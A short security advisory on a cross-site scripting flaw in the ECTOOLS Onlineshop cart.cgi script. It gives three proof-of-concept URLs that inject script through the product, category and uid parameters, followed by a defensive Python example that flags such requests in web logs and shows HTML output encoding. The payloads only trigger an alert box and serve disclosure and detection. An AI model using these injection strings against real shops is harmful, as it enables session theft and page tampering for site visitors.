ECTOOLS Onlineshop Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept examples are available:

http://www.example.com/cart.cgi?action=link&product=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.example.com/cart.cgi?action=search&category=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.example.com/cart.cgi?action=link&product=33&uid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
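
A defender's view of the requests above, as an added example that is not part of the original advisory: it scans web server log lines for cart.cgi requests whose product, category or uid parameter decodes to HTML metacharacters, and shows the output encoding that keeps such a value inert when reflected. The Common Log Format, the sample log lines and all function names are assumptions made for this illustration.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qsl

# Parameters the proof-of-concept URLs on this page inject into.
WATCHED_PARAMS = {"product", "category", "uid"}
# Characters needed to close an attribute value and open a new tag.
HTML_META = re.compile(r'[<>"]')
# Request line inside a Common Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cart.cgi?action=link&product=33 HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /cart.cgi?action=search&category=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E HTTP/1.1" 200 640
192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /cart.cgi?action=link&product=33&uid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E HTTP/1.1" 200 655
192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.html?category=%3Cb%3E HTTP/1.1" 200 128
""".splitlines()

def suspicious_params(url):
    """Return sorted names of watched cart.cgi parameters carrying HTML metacharacters."""
    parts = urlsplit(url)
    if not parts.path.endswith("/cart.cgi"):
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl percent-decodes once, so %22%3E is compared as ">
        if name in WATCHED_PARAMS and HTML_META.search(value):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Yield (line_number, parameter_names) for each flagged log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            names = suspicious_params(match.group(1))
            if names:
                yield number, names

def encode_for_html(value):
    """Output encoding that keeps a reflected value inside its attribute."""
    return escape(value, quote=True)

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: HTML metacharacters in {', '.join(names)}")
```
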


 

Copyright 2010, SecurityFocus